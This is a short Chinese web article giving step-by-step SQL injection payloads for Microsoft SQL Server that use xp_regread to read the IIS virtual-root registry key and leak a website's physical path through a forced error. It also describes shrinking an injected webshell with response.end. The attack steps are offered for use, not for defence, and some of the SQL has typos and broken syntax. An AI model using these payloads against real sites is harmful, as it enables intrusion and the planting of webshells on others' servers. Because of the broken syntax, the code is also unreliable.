DB权限暴出网站物理路径代码pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范DB权限暴出网站物理路径代码

DB权限暴出网站物理路径代码


2008/12/1  编辑:佚名 来源:本站整理

1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 建造表


  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中


  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段


  4、drop table [jm_tmp]-- 删除此表。


另附上备分专用一句话
  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,就在一句话这里打止,也就减小了webshell的大小.
 

相关文章
  • 谷歌Cardboard:虚拟现实体验 Google CardBoard眼镜使用体验
  • 安卓adb是什么?
  • android ADB操作命令
  • adb命令与fastboot命令的区别
  • 安卓手机adb驱动安装教程
  • dbf阅读器怎么用
  • dbf是什么文件?
  • rdb是什么文件
  • 如何禁止产生Thumbs.db和删除
  • DEDECMS 5.1 feedback_js.php 0DAY
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图